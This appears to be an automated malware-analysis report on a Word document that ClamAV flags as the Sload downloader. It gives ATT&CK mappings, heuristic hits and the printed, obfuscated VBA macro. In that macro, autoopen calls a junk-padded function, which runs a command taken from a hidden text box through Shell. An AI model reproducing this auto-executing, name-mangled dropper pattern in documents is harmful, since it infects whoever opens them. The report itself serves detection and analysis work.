Verdict: MALICIOUS
Risk Score: 292
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The 'autoopen' macro is present and triggers the execution of a VBA function that includes calls to Shell(), indicating an attempt to run external commands. Heuristics also flag suspicious cmd.exe and PowerShell references, suggesting the macro is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786417-0' further supports this assessment.
Heuristics (10)
- ClamAV: Doc.Downloader.Sload-6786417-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6786417-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched lines in script:
  `Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD`
  `BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP)`
  `Select Case WobDQDQUjCLRikJVzhfX`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"`
  `Sub autoopen()`
  `fZfbF`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11572 bytes |

Details for macros.bas:
- SHA-256: 5e0781f7ad1abe314cf155edc1fd6ae829aac77f03b6acd5b1ea27a790e8ef64
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely. 309 of 350 identifiers look randomly generated (e.g. 'ulFrjJiawUvPzmCLICQmvCGF') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "XTzcjasLs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
fZfbF
End Sub
Attribute VB_Name = "XrLnRQJJqddWhD"
Function fZfbF()
On Error Resume Next
Select Case wRJzodfHKzrHOzVitsKcmjq
Case 28336665
lIasjJamAJzkaMbQKocpI = jjRAzPQFRbEQDVEO
pRUNpXtTfjMbrNPabbr = Log(jMKVurWjJJGLwNmXnwq)
XjRjEiZNpqbtNnsd = 46042415
TwBNJWdAiibrmflfDCviRQRI = ThMwJUJQpdsKKXvCEzumzDw
Case 50705491
jqichDjsWqoQCVJSbzBtU = 297703414
zbMQWWsPkFPZianHZLRn = Log(GlCdlUWFuOOqLiBVmJWd)
DLmwirnqchCFwtpKmlB = 145760435
qqBjTsmmmBuJFCaQ = Log(GdjPSjLkMpLKAYVHQNUkN)
End Select
Set wAEpfIvsqPuEfYmu = JqwHDbbmdZCppFfUui
Select Case rKlFfCkcKIlcPtbJVtki
Case 79014147
LDOaYXmvwskuwqMGrNAR = QEiYIAGupWGQLziqEd
qPMtsUwlzOCXiuLu = Log(fCPXfAHViilqiQmjnbFELqDL)
JfmzbWzFjLCOpKOEX = 91561221
LuTwQnqSGqnowDHWUUWCIm = uEjVzRqzncNAVqhWLlDsO
Case 317626379
EKiotkBLiYJYtjSsBP = 284442662
LlDmjnwKREtWwi = Log(LPczOlRfbLRnptsBdXwK)
GwHGlqudfmaLBHdYS = 186196710
uFbaPAJRYCQzCXMET = Log(rduWBwYqbomOdLvhQN)
End Select
Set VsFcZVaOnYooCKDbzTXD = BYYUfJZFDUGzZzclAVBb
Select Case ulFrjJiawUvPzmCLICQmvCGF
Case 104852227
uSMRFMkBPditKuAUJSNXGs = icaQhDriAbtPQNh
jfwWYhOsWlbsossjB = Log(hoivCwYziSQfkGcD)
sKWjwOhuwbzqHjJNFfsk = 263917251
wwZDwbqAVQkPAZibkazB = WZJWiHRiajSpPLY
Case 65103670
RFDvGiFrjjjiuSmmWbZQjNU = 161900265
ujRakNGRrIrzLQqDfz = Log(izfRfCskztMDlfZLCoR)
VdNDJvpKLiMBNvpWPPlYsdGX = 208235592
GSmEnPNBCFlcHkN = Log(YQjKpppCwnCtGsWqXEoWY)
End Select
Set vzoMtkkmHAKJEqq = ORcjIANUvKjvFDwqJS
Select Case azCMNDccczNwALsCEC
Case 146960193
zaYhRLwsiqfYiSuHwY = ToWrOYCWqDAJWZw
zbVvBFkwlRpShQlGfu = Log(iciKIPpHpdjJwj)
vjadGOEYFwikoaRtdbXQsQQN = 211186359
zuUFIrljUFjCoodE = NaiAhXkChaPFfPNzuQKD
Case 3504904
qwEFMNbnjmnnDmBLQWkCaQ = 145312446
ppTFtXTAcYjjwcKXatrc = Log(sLavjAnTzNacaPWtW)
LTmKiDVOoLMchZtLwisJKXf = 217964709
LJDVModEAjJfhjWaUMbG = Log(jAjPTsBNjnoFfTuRtb)
End Select
Set jXjsjjOzWipLDaJfIUG = vcqQsUZCNcIbkEXzzIziEui
Select Case NGLGswtzPWjDDN
Case 317598670
zGAncwTzEjTmFYjCYPtiIo = CbJqrKVavHFbiZkY
nNCJfHsrqdinTRiKu = Log(MSHbniIXizzzdnrirumDXUQz)
jrmbqbQoaYFHLa = 134419769
HdtusArwoajYqb = BIbHrWvoXjICOlXfURDPqXF
Case 52043167
zqnPsrwzjEwkTddLpVNk = 326581122
KRuOGnLBiDTbrfIYfoK = Log(ihYvBoZEBBrXiX)
VVdlKnfZvRsmwCQqZZuu = 193603507
wNSNHzcLvsTAmDCDzQCHdiJ = Log(bBlLSwodCdWQSz)
End Select
Set jzjVzSzQNoVZdrVPUDQm = ORtzDqzJjlkCjVK
Select Case ERviYisJDiDkOHdirUMBQPV
Case 286766586
TWBGbltACXiKBiCilRjSaiY = pzZkWcowEnELqCcsKkMk
TpqJXfzoYQpwWRcMIdZjmGO = Log(qoipnIqSolVJjbwzqHf)
PNUlAjBGnBHNbQTjwI = 2945696
ZXKkvSchibsfbqKcT = pHHkfmdIiSIPAiHPzsDjphDU
Case 180962310
IclkGqPzStIpsXHn = 236601212
ZPaKXLtSZkHHDnIT = Log(BWwMRABPOHHAjcCztvMk)
EaqoQisKpVhYsFRlzHPZuJEl = 119558283
IFKKrwifzwHYAVIEYlabnWl = Log(vnzLEuVEVYWnAfdk)
End Select
Set NIUiZGtRplTLqFlTwODzXb = aCCcwVDsIplaOQ
Select Case DSoJVFwEIwcQrWZoOQlYD
Case 272940126
YMWSAThulQcSnqNhKuRnfl = jmzVzlPDfOcPwznwkaDr
ODmwAibdlBKnjpfCwhJVNzEK = Log(QiXwjMbucRiKXwDoZtM)
bNJHvmstVmRzcXjzD = 219496697
oitGYzrbjGhnErs = DZPBuTiYqAjizPDksoYjiHlK
Case 21949520
JnnzMHjYjanjKUAU = 106356873
NJbTDzvPTJQvnFzjKu = Log(qnbzbicwMiDiNrNwujqkq)
wnaIlmiiaKFjZj = 249589119
zlaAilQaCEZIDzTK = Log(mqoYTzpNdDsdiSiKjkFKpVLX)
End Select
Set FjNZibqunmszljnkmFiXzYmv = TPOAGRfQZNQcozcCiqflNwDR
Const nOBksY = 0
Select Case jmkuSDKWinznHrpAiTd
Case 136736458
PpmAvnRqvaYzmEjb = IAqjmjhiEUwQvV
pNQwzuWQsjjMaqUnFYcK = Log(iidFFRrSSazFtHYomdHm)
zzCXGsjhsrTKDKjmqsdiz = 171598839
jGjiwwTuUYrhiah = YIlZijvqzoBvliHnXsSRaJni
Case 169223328
wmLdELJuEWMAYDKqlHzXIqQE = 64828483
HQYPVCAkiJiTjpmrZlbXUP = Log(jYflCoHVHTTEsWp)
JAnVBLRXHkRRfd = 255107008
sJoqpRzwaoXAQluVj = Log(SXhtFYGHdRXqpijBLjhwL)
End Select
Set CqvNoRGVqwhvLPkwDQjinjZ = wtTPaKnkYaUqwskpBIbbJ
Select Case JMvSMWiWXMTkVwYRTkJUvti
Case 4011724
abOwUNiqBXSJfNhrjZALm = zzhFCTVzPiuhmv
ZDzltUZFHnXccOUhoz = Log(bQOPKPVEHoPwbmXGWBa)
farZRirsivwFiLUDKnoWXQR = 114039684
pvqFHzjOGuBYozjXdVMsJPP = TviMEUPIahcjBnazP
Case 286695508
QSiVqIwuuFZjZfYlMPU = 63169830
itwHUzWquOcRozzpasEGaV = Log(BwCDdCOivhplZj)
VLcEzqwRljYwlWPDL = 64498236
wIStsnjjjjwNaILWsdWVME = Log(RWEGcLfiicijFDRjQTKPh)
End Select
Set TwnazXZpoisbBXnhDUBFUl = ZGTbuGBBoAiDGSCLIEpnEri
Select Case cDLzjLRifaYwLuYmF
Case 236756876
WjFwXmhXqQwsvAL = zSdiHzBpAPnHmUbJ
GikXHoLznbNhhdwAjYUbBzYi = Log(vHzZlWpowoVbnsiSj)
WoHTmqHDvHhuJFFILh = 80035092
CFYsloaYvfqJSdCqHcV = ShahHBfPVihwGJR
Case 112505020
OhzPiHPRXcfDPAjLD = 47738957
iqlkILDQwtDILlasuX = Log(jaKQkYAMFiwkCCwmZdzoEfq)
XUTTSpIooKXuTaALI = 334873604
mAIAFPwAOzjoEjtsPEjtPWKw = Log(iCTzdmfFjERPTNETptqFWTK)
End Select
Set hlGcFiQpLIbMfBlLDiX = bdvrbaacTrVLstRsfDAw
Select Case QDVqAFjYWXCDNz
Case 14286292
WnwfEKQtURiiGAH = XqOwLjruqLhLjjIonasZwhz
mcViWESWQKfWlFv = Log(vDotdFKkJuqfHhvqtIKjNJ)
ltKvYElDhiFissEchSk = 161334711
OmPiOpdcvLZlfDzTKljY = IABDDzojdQdluXGvMKPHamT
Case 207200612
MoFJWhDAlFlNfLrpvSvwAkj = 294563860
zaRQQWhWKqIjXGjZkJR = Log(hjzXSfUXisbIMlYGmj)
jDrVUiGXLLXPbPXqRb = 302794474
kBJnSOAWmhcmBniRqKioMHIM = Log(cAsovHismlhtDDFh)
End Select
Set liikOohGzGwFlctzcpOIh = ZwuOBAXnHYGcWddaNLLivAh
Select Case AiCJorBXcXlodCzfUjlt
Case 126697762
zEqRhiraTOiQwNW = SWrpwoJtDYisYzc
MsizTWJXjBEWKMEkJORO = Log(dILvwOJzwCUlwE)
iYmvMUJwkmjqTuj = 67835953
NiikXCWIAYhzklLIwGkbW = jULbINYpEOrmXT
Case 145109486
GWPnMvbzzBXhVnziLM = 328240618
YwuJjKTTHzNsmczN = Log(joktObHpqUROJbLV)
zKcFDCcIpCnfvto = 248939544
cXMTJUmUtpCEwWBWdf = Log(lGfmIlZYUJvbcdmzoIonpp)
End Select
Set KMZDqjlJROzAQwlEikwSK = OZbMWNNprzvUVZihisiAiNdd
tHUaIkk = XTzcjasLs.TextBox1.Text + wAciJ + EGDtX + bWzEvaLV + pUJJinGY + aiEEi + DkKSB + CqdYa + iFCpnQuz + opOmsjt
Select Case tqmLIOtFdOQAZsRRjjRzjw
Case 159085602
zQwRAwwWPRCqsQpmmMGV = kkWGtwzbmGwRHLsS
FhStlIpbZPriMWqCROfa = Log(HzwvdLFYkFzTKHYD)
zcjiTiGwZjGPqwMsRw = 237351975
wHwjCpKtLCPSwzOCtj = OszEczIuIkasIokVsfzciY
Case 83763926
WToQshKzlKVbwCUjtvCJk = 67158936
dOcWWvDJqfOiILs = Log(aabHwTJWpLNijV)
AMMKCQLnDhAivk = 136693081
YBtcjJDIKFFjLiVa = Log(cNVvAplOnXZzoNlUzp)
End Select
Set ptUrJEAzKfbVLaJTXwQY = HNvldKWsULMtpkbH
Select Case UCwjPhzVnlQwZrjwhMk
Case 62701598
BCBoWPFlGkdmABomclEcCfv = nKYHwRtFTjTAuutR
khAmKYpsKFafhqVGnBLqwpp = Log(XSQiorhrmkSwuadljPmMSam)
wtGtiatusJOrIGESXiswXWM = 85009957
ZHiDcYzjWkvknJLrYGk = lddLTojhqWbjtVIT
Case 68157354
PlRLlWJhjZjEzQbAmwdXko = 266583239
qAIOrSArhhrzuarGC = Log(EKAlWLEsiMqmGawAVlOuqR)
oXSZcGMEXVzjdQFiwJw = 234869250
BubQCuFGsHvnlLNEmcmWHS = Log(IqSkQHRkrhkndqIZM)
End Select
Set wfOBwsErZKhLNjj = SZjJpwaWEFBYkNiCaOJn
Select Case wMPwcuYDHJVhbfoFDjfqiLfT
Case 206558303
YSkruTpwwFuIGwAGzloYthWY = BZjOkjwThWFTQOCrijjLv
hpcMufGCqwLIstGhNYwp = Log(bumjWmhOAnNnYsumYmR)
ifJHHWIlzSKNGCGv = 271974188
XtZnqJwVTBMupmjduvkf = AiwRhcAhWlwzvOYnrpA
Case 60365705
CGYCdXjdHKKKBXPcWIjwoz = 105311353
ztYIqDGkVowXXPEF = Log(EObnntrIKVjUKwEqLE)
zXmEEaoNYrFGEaikjoZKz = 214806972
fiZPLpthMKTGwRKWNzjSREOb = Log(jOVBlukSXHWiKcYfJtwkUhS)
End Select
Set SMLTOibTzWiaXjaPjnZ = nrCWImHLSqZwvwiZ
Select Case MXwJjKICkzRVbZuVhIXLChYB
Case 223978794
ZZFtLVWkRNCNMRDdYizws = iPPLOdsiwubwljwqnvwqHjT
wFIZIuClsjvqiAHtsm = Log(HlNjUjiqDzBlzwuPI)
TVEsqFEoGMnoFwURLi = 229534311
osaDwnruzujkwYYQKPv = bfaWDPsDQfkMjjh
Case 173519319
AuCOJqMcCpjZDHwnazISEAi = 308565788
dRJXEPrwVKVttRpNtAaLiN = Log(nYFlYHqzLHajYCFwZpa)
wbuhjSFLzIiJQsWwwiSqf = 70441711
lSlQKoBAWDfcLdYF = Log(CizDYRPfjGAuXjB)
End Select
Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD
BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP)
Select Case WobDQDQUjCLRikJVzhfX
Case 35180200
kZkdXKsiXLpdjafPjqHMPF = ElpFINBuwXfDCSnjGbCfA
BEiqhzoQtaisfrhFkQW = Log(sFAXcwwKAkNajcklW)
fDFjiFYKmvwBrlIkj = 318342455
LNlBiQIMELDHvi = kTKMauwSJAMwtbRwt
Case 262077770
LEuBbPWtUwjoCSYBpZWVI = 86534094
cBRROkmOJTNXOqRiwEBdUZL = Log(jUabWWSazJRAJwHI)
jZUovKLYraRGjaDpIluKK = 290469863
BnZFYRYzztvkzrVkKODfvA = Log(OiOLBMMzXrmTBVFmHS)
End Select
Set UMnpDwmAkwHMrATLWKFW = kwYtMXTPEbwMSjHasKMOM
Select Case QawqLwTlvbzjFiWzVZFbIoT
Case 190393607
HiZWhfKUQjwXVZjjHM = KPCjuFQjPXmcGTWDOtPOwmLo
YbzzZvAcWSFEwfQQwuwdHrD = Log(WSnrzAXDOoVdRjqclzjAQwPO)
zzsPKnhXzdGIJiWvCqJJmzRE = 132091822
HHDiXDZsADfoDBoGRDkUcVN = OIGEMwfnvSfZURG
Case 20953660
RdTQOnHVjhOUzQmuzTOzU = 205263489
XrskWOlAzjlKru = Log(AVwijRRTvCsiXzrGOmcvYV)
lGujRnOFvAIStz = 249792918
kGXzidkODFaXYPwQfSMcllAj = Log(wziPizHcnrpBXTHWjcLMr)
End Select
Set fBrnbmJMwFrPlfFzZITuk = JPIwEGFIpTqPRcXrWU
Select Case OQPLbImPzvZbrLQUE
Case 94400184
TdQXwVrbiKqwCcjkAC = rGSTfGWKlAjoHzATmwt
pjjIEIzWzLaQRdXNAK = Log(QaLGbzWiwBItlGjkHZKOW)
zKZZQXdcmScOdsic = 36354091
iZwUqRoJhtPoqvOG = AjBjwFVOpRXdrGiUwfw
Case 71022157
UIlGpkNwcjAWQiwEijUd = 40476887
zQjqmkUrPRvzjY = Log(ZJVIQNlXGbciPUwch)
TIUawzcilQiaTzYoFZw = 140253874
nOtaPKCEXTpOYNPvzKYflb = Log(pfHiKaOWdMifubzjma)
End Select
Set OzsMukItGPapELtEuHj = dIwMCqhVUzblFMNXwTNtBhI
Select Case tmPTCTmiMNnFUQtU
Case 253541542
SWiLFNjkdwfCFsjWsMMq = FTSEOCTkVhZjiRZhihB
RppCJIuYwYhHvCMCMHqLQ = Log(HOGWabGpKfLHJQ)
QuGHulzARlbEXVaqpTRh = 176400183
niTRJOCwoswXwNkDVOKOplwW = TjoVnsjDUHXoccjwUwjHz
Case 163724978
GlzCWMGCjwipiNaB = 149075
UbGMPtmbPUoPOjvW = Log(kpqMqNEnrtmEktvjuiwGt)
EQvwlNUiwuIjqLJBdO = 8553705
YzzXfatjUEwPnOlaQuc = Log(TJvrwEDjZtBiFUzFQYRLUoN)
End Select
Set wsscajkjmKGODIbaXJGbDPJ = QfKscQWivBvDLbJpIR
End Function